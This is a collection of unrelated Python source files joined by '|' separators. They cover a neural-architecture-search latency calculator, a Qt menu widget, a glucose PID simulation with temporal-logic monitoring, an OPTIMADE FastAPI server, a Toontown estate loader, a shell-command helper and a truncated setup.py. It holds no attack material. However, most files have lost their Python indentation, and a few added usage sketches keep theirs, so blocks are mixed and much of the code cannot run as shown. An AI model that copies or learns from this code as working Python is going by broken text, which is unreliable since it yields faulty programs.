#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
# Ravi Krishna 07/25/21
# LR step function based heavily on existing
# PyTorch implementations of LR schedulers,
# and specifically _LRScheduler and LambdaLR.
# Import statements.
import torch
import torch.optim
import timeit
# Constants.
STR_TO_OPTIM = {"sgd" : torch.optim.SGD,
"adam" : torch.optim.Adam,
"adagrad" : torch.optim.Adagrad}
KAGGLE_DAYS = 7
class Timer:
level = 0
def __init__(self, name):
self.name = name
def __enter__(self):
self.start = timeit.default_timer()
Timer.level += 1
def __exit__(self, *a, **kw):
Timer.level -= 1
print(
f'{" " * Timer.level}{self.name} took {timeit.default_timer() - self.start} sec')
def vectors_sum(vecs):
"""
Sum vectors in a list.
"""
cat_vecs = torch.cat(vecs, -1)
cat_vecs_2d = torch.reshape(cat_vecs, (len(vecs), vecs[0].size()[0]))
vecs_sum = torch.sum(cat_vecs_2d, axis=0)
return vecs_sum
def calculate_latency_efficient(mask_vals,
indices_look_up_table,
latency_table_ms,
num_s_net_layers,
fc_sizes_list,
input_dim,
output_dim):
"""
Calculates the overall super net latency
(across each input in the batch).
"""
# Store the total latency as a vector of
# dim batch_size. We can get
# batch_size from the dim of the mask values.
curr_batch_s = list(mask_vals[0][0].size())[0]
layer_latencies = []
# We need to store the input size probs
# for the next layer as we go through the super
# net (next layer means that one we just
# calculated the latency for, not the one we are
# going to calculate the latency for next).
next_input_probs = torch.ones(curr_batch_s, 1).to(latency_table_ms.device)
# Calculate the latency for each layer in the
# super net, starting from the last layer.
for layer_ix in range(num_s_net_layers - 1, -1, -1):
# Calculate latency for each output size
# and then take weighted sum with the
# output size probs.
curr_layer_latencies = []
if layer_ix != (num_s_net_layers - 1):
fc_sizes_use = fc_sizes_list
else:
fc_sizes_use = [output_dim]
for o_size_ix, curr_o_size in enumerate(fc_sizes_use):
# Store the latency for all of the operators in
# this layer with the output size curr_o_size.
curr_o_size_latencies = []
if layer_ix != 0:
fc_sizes_use_i = fc_sizes_list
else:
fc_sizes_use_i = [input_dim]
for i_size_ix, curr_i_size in enumerate(fc_sizes_use_i):
# Calculate the latency for this operator.
# Get the string corresponding to this FC op.
look_up_str = f"fc_{curr_i_size}_{curr_o_size}"
# Get the index of the look-up table corresponding
# to the operator string.
curr_op_latency_table_index = indices_look_up_table[look_up_str]
# Get the latency from the latency table at that index.
curr_op_latency = latency_table_ms[curr_op_latency_table_index]
# Get the probs for this layer.
curr_op_probs = mask_vals[layer_ix][o_size_ix][:, i_size_ix]
# Add to curr_o_size_latency.
curr_o_size_latencies.append(curr_op_latency * curr_op_probs)
# Now get the probs for this output size.
# next_input_probs is of size (batch_size, num_input_sizes_for_next_layer).
curr_o_size_probs = next_input_probs[:, o_size_ix]
# Sum the curr_o_size_latencies.
curr_o_size_latency = vectors_sum(curr_o_size_latencies)
# Add the weighted latency to the overall latency of this layer.
weighted_latency = torch.mul(curr_o_size_latency, curr_o_size_probs)
curr_layer_latencies.append(weighted_latency)
# Update next_input_probs.
# If layer_ix is 0, this will not matter anyway.
old_next_input_probs = next_input_probs
# Input and output sizes.
if layer_ix != 0:
curr_i_sizes = fc_sizes_list
else:
curr_i_sizes = [input_dim]
if layer_ix != (num_s_net_layers - 1):
curr_o_sizes = fc_sizes_list
else:
curr_o_sizes = [output_dim]
# Input probabilities.
table_device = latency_table_ms.device
zero_vector = [0.00] * len(curr_i_sizes)
next_input_probs = torch.zeros(curr_batch_s, len(curr_i_sizes)).to(table_device)
for curr_i_size_ix, _curr_i_size in enumerate(curr_i_sizes):
# The probability that we will use this input size
# is the sum of the probs that we will use any
# of its output sizes times the correct probs.
curr_i_size_probs_list = []
for curr_o_size_ix, _curr_o_size in enumerate(curr_o_sizes):
# Mask values.
curr_mask_vals = mask_vals[layer_ix][curr_o_size_ix][:, curr_i_size_ix]
# Old input probs.
curr_old_next_probs = old_next_input_probs[:, curr_o_size_ix]
# Probabilities.
curr_probs = torch.mul(curr_mask_vals, curr_old_next_probs)
curr_i_size_probs_list.append(curr_probs)
# Sum curr_i_size_probs_list to get curr_i_size_probs.
curr_i_size_probs = vectors_sum(curr_i_size_probs_list)
# Set the correct values in next_input_probs to curr_i_size_probs.
next_input_probs[:, curr_i_size_ix] = curr_i_size_probs
# Sum the curr_layer_latencies to get current_layer_latency.
current_layer_latency = vectors_sum(curr_layer_latencies)
# Add the latency for the current layer to the overall super net latency.
layer_latencies.append(current_layer_latency)
# Calculate the total latency as the sum of each layer's latency.
total_latency = vectors_sum(layer_latencies)
# Return the total latency.
return total_latency
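# Illustrative usage sketch (not part of the original file): builds a tiny, made-up
# super net description and calls calculate_latency_efficient on it. The layer sizes,
# latencies, and mask probabilities are arbitrary; the point is the expected shapes:
# mask_vals[layer][output_size_index] is a (batch_size, num_input_sizes) tensor of
# probabilities, and latency_table_ms is indexed via indices_look_up_table["fc_{in}_{out}"].
def _example_calculate_latency_efficient():
    batch_size = 2
    input_dim, output_dim = 4, 3
    fc_sizes_list = [8, 16]
    num_s_net_layers = 2
    # Hypothetical latency table with one entry per FC operator string.
    op_strs = [f"fc_{i}_{o}"
               for o in fc_sizes_list + [output_dim]
               for i in fc_sizes_list + [input_dim]]
    indices_look_up_table = {s: ix for ix, s in enumerate(op_strs)}
    latency_table_ms = torch.rand(len(op_strs))
    # Layer 0 consumes input_dim (one input size, two output sizes);
    # layer 1 (the last layer) produces output_dim (two input sizes, one output size).
    mask_vals = [
        [torch.full((batch_size, 1), 1.0) for _ in fc_sizes_list],
        [torch.full((batch_size, len(fc_sizes_list)), 0.5)],
    ]
    return calculate_latency_efficient(
        mask_vals, indices_look_up_table, latency_table_ms,
        num_s_net_layers, fc_sizes_list, input_dim, output_dim)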
# Adjusts optimizer learning rate.
def step_lambda_lr(optimizer,
lr_lambdas,
current_epoch,
initial_optimizer_lrs):
# Iterate through each parameter group
# in the optimizer, as well as the
# lambda and the original LR.
lists_zip_obj = zip(optimizer.param_groups, lr_lambdas, initial_optimizer_lrs)
for param_group, lr_lambda, initial_lr in lists_zip_obj:
param_group["lr"] = lr_lambda(current_epoch) * initial_lr
# Add a return statement for clarity.
return
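# Hedged usage sketch (not from the original code): shows the call pattern for
# step_lambda_lr with a toy optimizer. The model, decay schedule, and learning
# rates below are invented for illustration only.
def _example_step_lambda_lr():
    model = torch.nn.Linear(4, 2)
    optimizer = torch.optim.SGD(model.parameters(), lr=0.1)
    # One lambda and one initial LR per parameter group.
    lr_lambdas = [lambda epoch: 0.5 ** epoch]
    initial_optimizer_lrs = [0.1]
    for epoch in range(3):
        step_lambda_lr(optimizer, lr_lambdas, epoch, initial_optimizer_lrs)
        print(epoch, optimizer.param_groups[0]["lr"])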
def arch_sampling_str_to_dict(sampling_str):
"""
    Converts string representations of architecture
sampling methodology to the dictionary format
that nas_searchmanager.SearchManager uses.
Example:
\"1:4,2:4,3:4,4:4\" is converted to
{1.0 : 4, 2.0 : 4, 3.0 : 4, 4.0 : 4}.
"""
# Remove any spaces that the user may have
# entered into the string representation.
sampling_str = sampling_str.replace(" ", "")
# Split by comma to get the architectures sampled
# at each number of architecture parameters epochs
# completed.
archs_sampled_list = sampling_str.split(",")
# Convert the list of epoch:num_archs_to_sample
# strings to the correct dictionary format.
arch_sampling_dict = {}
for curr_arch_sampling in archs_sampled_list:
# Split by colon.
[num_epochs_elapsed, num_archs_to_sample] = curr_arch_sampling.split(":")
# Add to dictionary.
arch_sampling_dict[float(num_epochs_elapsed)] = int(num_archs_to_sample)
# Return the dictionary.
return arch_sampling_dict
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###################################################################
# Author: Mu yanru
# Date : 2019.3
# Email : muyanru345@163.com
###################################################################
"""A Navigation menu"""
# Import future modules
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Import third-party modules
from Qt import QtCore
from Qt import QtWidgets
# Import local modules
from dayu_widgets import dayu_theme
from dayu_widgets.button_group import MButtonGroupBase
from dayu_widgets.divider import MDivider
from dayu_widgets.tool_button import MToolButton
class MBlockButton(MToolButton):
"""MBlockButton"""
def __init__(self, parent=None):
super(MBlockButton, self).__init__(parent)
self.setCheckable(True)
class MBlockButtonGroup(MButtonGroupBase):
"""MBlockButtonGroup"""
sig_checked_changed = QtCore.Signal(int)
def __init__(self, tab, orientation=QtCore.Qt.Horizontal, parent=None):
super(MBlockButtonGroup, self).__init__(orientation=orientation, parent=parent)
self.set_spacing(1)
self._menu_tab = tab
self._button_group.setExclusive(True)
self._button_group.buttonClicked[int].connect(self.sig_checked_changed)
def create_button(self, data_dict):
button = MBlockButton()
if data_dict.get("svg"):
button.svg(data_dict.get("svg"))
if data_dict.get("text"):
if data_dict.get("svg") or data_dict.get("icon"):
button.text_beside_icon()
else:
button.text_only()
else:
button.icon_only()
button.set_dayu_size(self._menu_tab.get_dayu_size())
return button
def update_size(self, size):
for button in self._button_group.buttons():
button.set_dayu_size(size)
def set_dayu_checked(self, value):
"""Set current checked button's id"""
button = self._button_group.button(value)
button.setChecked(True)
self.sig_checked_changed.emit(value)
def get_dayu_checked(self):
"""Get current checked button's id"""
return self._button_group.checkedId()
dayu_checked = QtCore.Property(
int, get_dayu_checked, set_dayu_checked, notify=sig_checked_changed
)
class MMenuTabWidget(QtWidgets.QWidget):
"""MMenuTabWidget"""
def __init__(self, orientation=QtCore.Qt.Horizontal, parent=None):
super(MMenuTabWidget, self).__init__(parent=parent)
self.tool_button_group = MBlockButtonGroup(tab=self, orientation=orientation)
if orientation == QtCore.Qt.Horizontal:
self._bar_layout = QtWidgets.QHBoxLayout()
self._bar_layout.setContentsMargins(10, 0, 10, 0)
else:
self._bar_layout = QtWidgets.QVBoxLayout()
self._bar_layout.setContentsMargins(0, 0, 0, 0)
self._bar_layout.addWidget(self.tool_button_group)
self._bar_layout.addStretch()
bar_widget = QtWidgets.QWidget()
bar_widget.setObjectName("bar_widget")
bar_widget.setLayout(self._bar_layout)
bar_widget.setAttribute(QtCore.Qt.WA_StyledBackground)
main_lay = QtWidgets.QVBoxLayout()
main_lay.setContentsMargins(0, 0, 0, 0)
main_lay.setSpacing(0)
main_lay.addWidget(bar_widget)
if orientation == QtCore.Qt.Horizontal:
main_lay.addWidget(MDivider())
main_lay.addSpacing(5)
self.setLayout(main_lay)
self._dayu_size = dayu_theme.large
def tool_bar_append_widget(self, widget):
"""Add the widget too menubar's right position."""
self._bar_layout.addWidget(widget)
def tool_bar_insert_widget(self, widget):
"""Insert the widget to menubar's left position."""
self._bar_layout.insertWidget(0, widget)
def add_menu(self, data_dict, index=None):
"""Add a menu"""
self.tool_button_group.add_button(data_dict, index)
def get_dayu_size(self):
"""
Get the menu tab size.
:return: integer
"""
return self._dayu_size
def set_dayu_size(self, value):
"""
Set the menu tab size.
:param value: integer
:return: None
"""
self._dayu_size = value
self.tool_button_group.update_size(self._dayu_size)
self.style().polish(self)
dayu_size = QtCore.Property(int, get_dayu_size, set_dayu_size)
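# Hedged usage sketch (not part of the original module): shows the data_dict keys
# that MBlockButtonGroup.create_button inspects ("svg", "text", "icon") when menus
# are added. It assumes a running QApplication and that the dayu_widgets theme is
# applied elsewhere; the svg file name is a placeholder.
def _example_menu_tab():
    menu_tab = MMenuTabWidget()
    menu_tab.add_menu({"text": "Overview", "svg": "home_line.svg"})
    menu_tab.add_menu({"text": "Settings"})
    return menu_tab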
|
# coding: utf-8
import glob
import numpy as np
preds = [np.loadtxt(name) for name in glob.glob('*.pred')]
np.testing.assert_array_almost_equal(preds[0], preds[1], decimal=5)
|
import numpy as np
from pyDOE import lhs
#from simulation1Day import simulation, hypoGlicemia, hyperGlicemia, pidC1
from scipy.integrate import odeint
import matplotlib.pyplot as plt
# To use Java from Python, specify the path to the Java installation.
import os
os.environ['JAVA_HOME'] = "/Library/Java/JavaVirtualMachines/jdk-11.0.8.jdk/Contents/Home"
from moonlight import *
# importing the model, the simulation function
from pancreasModel import modelPID, simulation
# setting the PID gains (Kp, Ki, Kd)
Kd = [0, -0.0602, -0.0573, -0.06002, -0.0624]
Ki = [0, -3.53e-07, -3e-07, -1.17e-07, -7.55e-07]
Kp = [0, -6.17e-04, -6.39e-04, -6.76e-04, -5.42e-04]
pidC1 = lambda x, t: modelPID(x, t, Kp[1], Ki[1], Kd[1])
pidC2 = lambda x, t: modelPID(x, t, Kp[2], Ki[2], Kd[2])
pidC3 = lambda x, t: modelPID(x, t, Kp[3], Ki[3], Kd[3])
pidC4 = lambda x, t: modelPID(x, t, Kp[4], Ki[4], Kd[4])
pidC1Noise = lambda x, t: modelPID(x, t, Kp[1], Ki[1], Kd[1])
# defining the control parameters
t_meal1 = np.random.normal(300, 60)
t_meal2 = np.random.normal(300, 60)
t_meal3 = 1440 - t_meal1 - t_meal2
dg1 = np.random.normal(40, 10)
dg2 = np.random.normal(90, 10)
dg3 = np.random.normal(60, 10)
# trying to vary the PID controller pidC_i
t, y = simulation([t_meal1, t_meal2, t_meal3], [dg1, dg2, dg3], pidC2)
y = y[:,0];
# plot results
thresholdUp = 180;
thresholdDown = 70;
plt.fill_between([t[0],t[-1]], [4,4],[max(y),max(y)],alpha=0.5)
plt.plot(t,y,'r-',linewidth=2)
plt.axhline(y=thresholdUp, color='k', linestyle='-')
plt.axhline(y=thresholdDown, color='k', linestyle='-')
plt.xlabel('Time (min)')
plt.ylabel('BG (mmol/L)')
plt.show()
# defining the properties
script = """
signal {real y;}
domain minmax;
formula hypoGlicemia = globally [0.0, 1400] (y > 70);
formula hyperGlicemia = globally [0.0, 1400] (y < 180);
"""
moonlightScript = ScriptLoader.loadFromText(script)
# monitoring the properties
monitor = moonlightScript.getMonitor("hypoGlicemia")
y_signal = [[yy] for yy in y]
result = monitor.monitor(list(t),y_signal)
print('robustness:'+ str(result[0][1])) # robustness at time zero
# noise model
y_noise = [yy+ np.random.normal(0, 5) for yy in y]
plt.fill_between([t[0],t[-1]], [4,4],[max(y_noise),max(y_noise)],alpha=0.5)
plt.plot(t,y_noise,'r-',linewidth=2)
plt.axhline(y=thresholdUp, color='k', linestyle='-')
plt.axhline(y=thresholdDown, color='k', linestyle='-')
plt.xlabel('Time (min)')
plt.ylabel('BG (mmol/L)')
plt.show()
#falsification
def findMinimum(pid, N):
    minSTL = float('Inf')
    vSTL = None
for i in range(N):
t_meal1 = np.random.normal(300, 60)
t_meal2 = np.random.normal(300, 60)
t_meal3 = 1440 - t_meal1 - t_meal2
dg1 = np.random.normal(40, 10)
dg2 = np.random.normal(90, 10)
dg3 = np.random.normal(60, 10)
t, y = simulation([t_meal1, t_meal2, t_meal3], [dg1, dg2, dg3], pid)
y = y[:, 0]
y_signal = [[yy] for yy in y]
result = monitor.monitor(list(t),y_signal)
stl = result[0][1]
if (stl < minSTL):
minSTL = stl
vSTL = [t_meal1, t_meal2, t_meal3, dg1, dg2, dg3]
print(i)
print('minSTL parameter: ' + str(vSTL))
print('minSTL: ' + str(minSTL))
N = 10;
findMinimum(pidC2, N)
|
# pylint: disable=line-too-long
import json
from lark.exceptions import VisitError
from pydantic import ValidationError
from fastapi import FastAPI
from fastapi.exceptions import RequestValidationError, StarletteHTTPException
from fastapi.middleware.cors import CORSMiddleware
from optimade import __api_version__, __version__
import optimade.server.exception_handlers as exc_handlers
from .config import CONFIG
from .middleware import EnsureQueryParamIntegrity
from .routers import index_info, links
from .routers.utils import BASE_URL_PREFIXES
if CONFIG.debug: # pragma: no cover
print("DEBUG MODE")
app = FastAPI(
title="OPTIMADE API - Index meta-database",
description=(
f"""The [Open Databases Integration for Materials Design (OPTIMADE) consortium](https://www.optimade.org/) aims to make materials databases interoperational by developing a common REST API.
This is the "special" index meta-database.
This specification is generated using [`optimade-python-tools`](https://github.com/Materials-Consortia/optimade-python-tools/tree/v{__version__}) v{__version__}."""
),
version=__api_version__,
docs_url=f"{BASE_URL_PREFIXES['major']}/extensions/docs",
redoc_url=f"{BASE_URL_PREFIXES['major']}/extensions/redoc",
openapi_url=f"{BASE_URL_PREFIXES['major']}/extensions/openapi.json",
)
if not CONFIG.use_real_mongo and CONFIG.index_links_path.exists():
import bson.json_util
from .routers.links import links_coll
from .routers.utils import mongo_id_for_database
print("loading index links...")
with open(CONFIG.index_links_path) as f:
data = json.load(f)
processed = []
for db in data:
db["_id"] = {"$oid": mongo_id_for_database(db["id"], db["type"])}
processed.append(db)
print("inserting index links into collection...")
links_coll.collection.insert_many(
bson.json_util.loads(bson.json_util.dumps(processed))
)
print("done inserting index links...")
# Add various middleware
app.add_middleware(CORSMiddleware, allow_origins=["*"])
app.add_middleware(EnsureQueryParamIntegrity)
# Add various exception handlers
app.add_exception_handler(StarletteHTTPException, exc_handlers.http_exception_handler)
app.add_exception_handler(
RequestValidationError, exc_handlers.request_validation_exception_handler
)
app.add_exception_handler(ValidationError, exc_handlers.validation_exception_handler)
app.add_exception_handler(VisitError, exc_handlers.grammar_not_implemented_handler)
app.add_exception_handler(Exception, exc_handlers.general_exception_handler)
# Add various endpoints to `/vMAJOR`
app.include_router(index_info.router, prefix=BASE_URL_PREFIXES["major"])
app.include_router(links.router, prefix=BASE_URL_PREFIXES["major"])
def add_optional_versioned_base_urls(app: FastAPI):
"""Add the following OPTIONAL prefixes/base URLs to server:
```
/vMajor.Minor
/vMajor.Minor.Patch
```
"""
for version in ("minor", "patch"):
app.include_router(index_info.router, prefix=BASE_URL_PREFIXES[version])
app.include_router(links.router, prefix=BASE_URL_PREFIXES[version])
@app.on_event("startup")
async def startup_event():
# Add API endpoints for OPTIONAL base URLs `/vMAJOR.MINOR` and `/vMAJOR.MINOR.PATCH`
add_optional_versioned_base_urls(app)
|
from pandac.PandaModules import *
from toontown.toonbase.ToontownGlobals import *
from direct.interval.IntervalGlobal import *
from direct.fsm import ClassicFSM, State
from toontown.safezone import SafeZoneLoader
import random
from toontown.launcher import DownloadForceAcknowledge
import House
import Estate
import HouseGlobals
import math
from toontown.coghq import MovingPlatform
from direct.directnotify import DirectNotifyGlobal
class EstateLoader(SafeZoneLoader.SafeZoneLoader):
notify = DirectNotifyGlobal.directNotify.newCategory('EstateLoader')
def __init__(self, hood, parentFSM, doneEvent):
SafeZoneLoader.SafeZoneLoader.__init__(self, hood, parentFSM, doneEvent)
del self.fsm
self.fsm = ClassicFSM.ClassicFSM('EstateLoader', [State.State('start', self.enterStart, self.exitStart, ['quietZone', 'estate', 'house']),
State.State('estate', self.enterEstate, self.exitEstate, ['quietZone']),
State.State('house', self.enterHouse, self.exitHouse, ['quietZone']),
State.State('quietZone', self.enterQuietZone, self.exitQuietZone, ['house', 'estate']),
State.State('final', self.enterFinal, self.exitFinal, ['start'])], 'start', 'final')
self.musicFile = 'phase_4/audio/bgm/TC_nbrhood.mid'
self.activityMusicFile = 'phase_3.5/audio/bgm/TC_SZ_activity.mid'
self.dnaFile = 'phase_5.5/dna/estate_1.dna'
self.safeZoneStorageDNAFile = None
self.cloudSwitch = 0
self.id = MyEstate
self.estateOwnerId = None
self.branchZone = None
self.houseDoneEvent = 'houseDone'
self.estateDoneEvent = 'estateDone'
self.enteredHouse = None
self.houseNode = [None] * 6
self.houseModels = [None] * HouseGlobals.NUM_HOUSE_TYPES
self.houseId2house = {}
self.barrel = None
self.clouds = []
self.cloudTrack = None
self.sunMoonNode = None
self.fsm.enterInitialState()
return
def load(self):
SafeZoneLoader.SafeZoneLoader.load(self)
self.music = base.loadMusic('phase_4/audio/bgm/TC_nbrhood.mid')
self.underwaterSound = base.loadSfx('phase_4/audio/sfx/AV_ambient_water.mp3')
self.swimSound = base.loadSfx('phase_4/audio/sfx/AV_swim_single_stroke.mp3')
self.submergeSound = base.loadSfx('phase_5.5/audio/sfx/AV_jump_in_water.mp3')
self.birdSound = map(base.loadSfx, ['phase_4/audio/sfx/SZ_TC_bird1.mp3', 'phase_4/audio/sfx/SZ_TC_bird2.mp3', 'phase_4/audio/sfx/SZ_TC_bird3.mp3'])
self.cricketSound = map(base.loadSfx, ['phase_4/audio/sfx/SZ_TC_bird1.mp3', 'phase_4/audio/sfx/SZ_TC_bird2.mp3', 'phase_4/audio/sfx/SZ_TC_bird3.mp3'])
if base.goonsEnabled:
invModel = loader.loadModel('phase_3.5/models/gui/inventory_icons')
self.invModels = []
from toontown.toonbase import ToontownBattleGlobals
for track in range(len(ToontownBattleGlobals.AvPropsNew)):
itemList = []
for item in range(len(ToontownBattleGlobals.AvPropsNew[track])):
itemList.append(invModel.find('**/' + ToontownBattleGlobals.AvPropsNew[track][item]))
self.invModels.append(itemList)
invModel.removeNode()
del invModel
def unload(self):
self.ignoreAll()
base.cr.estateMgr.leaveEstate()
self.estateOwnerId = None
self.estateZoneId = None
if self.place:
self.place.exit()
self.place.unload()
del self.place
del self.underwaterSound
del self.swimSound
del self.submergeSound
del self.birdSound
del self.cricketSound
for node in self.houseNode:
node.removeNode()
del self.houseNode
for model in self.houseModels:
model.removeNode()
del self.houseModels
del self.houseId2house
if self.sunMoonNode:
self.sunMoonNode.removeNode()
del self.sunMoonNode
self.sunMoonNode = None
if self.clouds:
for cloud in self.clouds:
cloud[0].removeNode()
del cloud[1]
del self.clouds
if self.barrel:
self.barrel.removeNode()
SafeZoneLoader.SafeZoneLoader.unload(self)
return
def enter(self, requestStatus):
self.estateOwnerId = requestStatus.get('ownerId', base.localAvatar.doId)
base.localAvatar.inEstate = 1
self.loadCloudPlatforms()
if base.cloudPlatformsEnabled and 0:
self.setCloudSwitch(1)
if self.cloudSwitch:
self.setCloudSwitch(self.cloudSwitch)
SafeZoneLoader.SafeZoneLoader.enter(self, requestStatus)
def exit(self):
self.ignoreAll()
base.cr.cache.flush()
base.localAvatar.stopChat()
base.localAvatar.inEstate = 0
SafeZoneLoader.SafeZoneLoader.exit(self)
def createSafeZone(self, dnaFile):
SafeZoneLoader.SafeZoneLoader.createSafeZone(self, dnaFile)
self.loadHouses()
self.loadSunMoon()
def loadHouses(self):
for i in range(HouseGlobals.NUM_HOUSE_TYPES):
self.houseModels[i] = loader.loadModel(HouseGlobals.houseModels[i])
for i in range(6):
posHpr = HouseGlobals.houseDrops[i]
self.houseNode[i] = self.geom.attachNewNode('esHouse_' + str(i))
self.houseNode[i].setPosHpr(*posHpr)
def loadSunMoon(self):
self.sun = loader.loadModel('phase_4/models/props/sun.bam')
self.moon = loader.loadModel('phase_5.5/models/props/moon.bam')
self.sunMoonNode = self.geom.attachNewNode('sunMoon')
self.sunMoonNode.setPosHpr(0, 0, 0, 0, 0, 0)
if self.sun:
self.sun.reparentTo(self.sunMoonNode)
self.sun.setY(270)
self.sun.setScale(2)
self.sun.setBillboardPointEye()
if self.moon:
self.moon.setP(180)
self.moon.reparentTo(self.sunMoonNode)
self.moon.setY(-270)
self.moon.setScale(15)
self.moon.setBillboardPointEye()
self.sunMoonNode.setP(30)
def enterEstate(self, requestStatus):
self.notify.debug('enterEstate: requestStatus = %s' % requestStatus)
ownerId = requestStatus.get('ownerId')
if ownerId:
self.estateOwnerId = ownerId
zoneId = requestStatus['zoneId']
self.notify.debug('enterEstate, ownerId = %s, zoneId = %s' % (self.estateOwnerId, zoneId))
self.accept(self.estateDoneEvent, self.handleEstateDone)
self.place = Estate.Estate(self, self.estateOwnerId, zoneId, self.fsm.getStateNamed('estate'), self.estateDoneEvent)
base.cr.playGame.setPlace(self.place)
self.place.load()
self.place.enter(requestStatus)
self.estateZoneId = zoneId
def exitEstate(self):
self.notify.debug('exitEstate')
self.ignore(self.estateDoneEvent)
self.place.exit()
self.place.unload()
self.place = None
base.cr.playGame.setPlace(self.place)
base.cr.cache.flush()
return
def handleEstateDone(self, doneStatus = None):
if not doneStatus:
doneStatus = self.place.getDoneStatus()
how = doneStatus['how']
shardId = doneStatus['shardId']
hoodId = doneStatus['hoodId']
zoneId = doneStatus['zoneId']
avId = doneStatus.get('avId', -1)
ownerId = doneStatus.get('ownerId', -1)
if shardId != None or hoodId != MyEstate:
self.notify.debug('estate done, and we are backing out to a different hood/shard')
self.notify.debug('hoodId = %s, avId = %s' % (hoodId, avId))
self.doneStatus = doneStatus
messenger.send(self.doneEvent)
return
if how in ['tunnelIn',
'teleportIn',
'doorIn',
'elevatorIn']:
self.notify.debug('staying in estateloader')
self.fsm.request('quietZone', [doneStatus])
else:
self.notify.error('Exited hood with unexpected mode %s' % how)
return
def enterHouse(self, requestStatus):
ownerId = requestStatus.get('ownerId')
if ownerId:
self.estateOwnerId = ownerId
self.acceptOnce(self.houseDoneEvent, self.handleHouseDone)
self.place = House.House(self, self.estateOwnerId, self.fsm.getStateNamed('house'), self.houseDoneEvent)
base.cr.playGame.setPlace(self.place)
self.place.load()
self.place.enter(requestStatus)
def exitHouse(self):
self.ignore(self.houseDoneEvent)
self.place.exit()
self.place.unload()
self.place = None
base.cr.playGame.setPlace(self.place)
return
def handleHouseDone(self, doneStatus = None):
if not doneStatus:
doneStatus = self.place.getDoneStatus()
shardId = doneStatus['shardId']
hoodId = doneStatus['hoodId']
if shardId != None or hoodId != MyEstate:
self.doneStatus = doneStatus
messenger.send(self.doneEvent)
return
how = doneStatus['how']
if how in ['tunnelIn',
'teleportIn',
'doorIn',
'elevatorIn']:
self.fsm.request('quietZone', [doneStatus])
else:
self.notify.error('Exited hood with unexpected mode %s' % how)
return
def handleQuietZoneDone(self):
status = self.quietZoneStateData.getRequestStatus()
self.fsm.request(status['where'], [status])
def atMyEstate(self):
if self.estateOwnerId != None:
if self.estateOwnerId == base.localAvatar.getDoId():
return 1
else:
return 0
else:
self.notify.warning("We aren't in an estate")
return
def setHouse(self, houseId):
try:
houseDo = base.cr.doId2do[houseId]
self.enteredHouse = houseDo.house
except KeyError:
self.notify.debug("can't find house: %d" % houseId)
def startCloudPlatforms(self):
return
if len(self.clouds):
self.cloudTrack = self.__cloudTrack()
self.cloudTrack.loop()
def stopCloudPlatforms(self):
if self.cloudTrack:
self.cloudTrack.pause()
del self.cloudTrack
self.cloudTrack = None
return
def __cloudTrack(self):
track = Parallel()
for cloud in self.clouds:
axis = cloud[1]
pos = cloud[0].getPos(render)
newPos = pos + axis * 30
reversePos = pos - axis * 30
track.append(Sequence(LerpPosInterval(cloud[0], 10, newPos), LerpPosInterval(cloud[0], 20, reversePos), LerpPosInterval(cloud[0], 10, pos)))
return track
def debugGeom(self, decomposed):
print 'numPrimitives = %d' % decomposed.getNumPrimitives()
for primIndex in range(decomposed.getNumPrimitives()):
prim = decomposed.getPrimitive(primIndex)
print 'prim = %s' % prim
print 'isIndexed = %d' % prim.isIndexed()
print 'prim.getNumPrimitives = %d' % prim.getNumPrimitives()
for basicPrim in range(prim.getNumPrimitives()):
print '%d start=%d' % (basicPrim, prim.getPrimitiveStart(basicPrim))
print '%d end=%d' % (basicPrim, prim.getPrimitiveEnd(basicPrim))
def loadOnePlatform(self, version, radius, zOffset, score, multiplier):
self.notify.debug('loadOnePlatform version=%d' % version)
cloud = NodePath('cloud-%d-%d' % (score, multiplier))
cloudModel = loader.loadModel('phase_5.5/models/estate/bumper_cloud')
cc = cloudModel.copyTo(cloud)
colCube = cc.find('**/collision')
colCube.setName('cloudSphere-0')
dTheta = 2.0 * math.pi / self.numClouds
cloud.reparentTo(self.cloudOrigin)
axes = [Vec3(1, 0, 0), Vec3(0, 1, 0), Vec3(0, 0, 1)]
cloud.setPos(radius * math.cos(version * dTheta), radius * math.sin(version * dTheta), 4 * random.random() + zOffset)
cloud.setScale(4.0)
self.clouds.append([cloud, random.choice(axes)])
def loadSkyCollision(self):
plane = CollisionPlane(Plane(Vec3(0, 0, -1), Point3(0, 0, 300)))
plane.setTangible(0)
planeNode = CollisionNode('cloudSphere-0')
planeNode.addSolid(plane)
self.cloudOrigin.attachNewNode(planeNode)
def loadCloudPlatforms(self):
self.cloudOrigin = self.geom.attachNewNode('cloudOrigin')
self.cloudOrigin.setZ(30)
self.loadSkyCollision()
self.numClouds = 12
pinballScore = PinballScoring[PinballCloudBumperLow]
for i in range(12):
self.loadOnePlatform(i, 40, 0, pinballScore[0], pinballScore[1])
pinballScore = PinballScoring[PinballCloudBumperMed]
for i in range(12):
self.loadOnePlatform(i, 60, 40, pinballScore[0], pinballScore[1])
pinballScore = PinballScoring[PinballCloudBumperHigh]
for i in range(12):
self.loadOnePlatform(i, 20, 80, pinballScore[0], pinballScore[1])
self.cloudOrigin.stash()
def setCloudSwitch(self, on):
self.cloudSwitch = on
if hasattr(self, 'cloudOrigin'):
if on:
self.cloudOrigin.unstash()
else:
self.cloudOrigin.stash()
|
from subprocess import PIPE, Popen
def cmdline(command):
process = Popen(
args=command,
stdout=PIPE,
shell=True
)
return process.communicate()[0]
def subset(mydict, func):
return dict((key, mydict[key]) for key in mydict if func(mydict[key]))
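# Hedged usage examples (not in the original file): cmdline() runs a shell command and
# returns its stdout as bytes; subset() keeps only the entries whose values satisfy the
# predicate. The command and values below are illustrative.
if __name__ == '__main__':
    print(cmdline('echo hello'))                       # b'hello\n' on POSIX shells
    print(subset({'a': 1, 'b': 5}, lambda v: v > 2))   # {'b': 5}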
|
"""
Dependencies
- User
- Threat
"""
from .user import is_user_admin, get_current_user
__all__ = [
"is_user_admin",
"get_current_user"
]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
import os
import re
APP = 'pypolona'
CLI = 'ppolona'
readme_file = os.path.join(os.path.dirname(
os.path.abspath(__file__)), 'README.md')
with open(readme_file) as f:
readme = f.read()
def get_version(*args):
ver = "undefined"
import pypolona.__init__
try:
ver = pypolona.__init__.__version__
except AttributeError:
verstrline = open(os.path.join(APP, '__init__.py'), "rt").read()
VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]"
mo = re.search(VSRE, verstrline, re.M)
if mo:
ver = mo.group(1)
return ver
def get_requirements(*args):
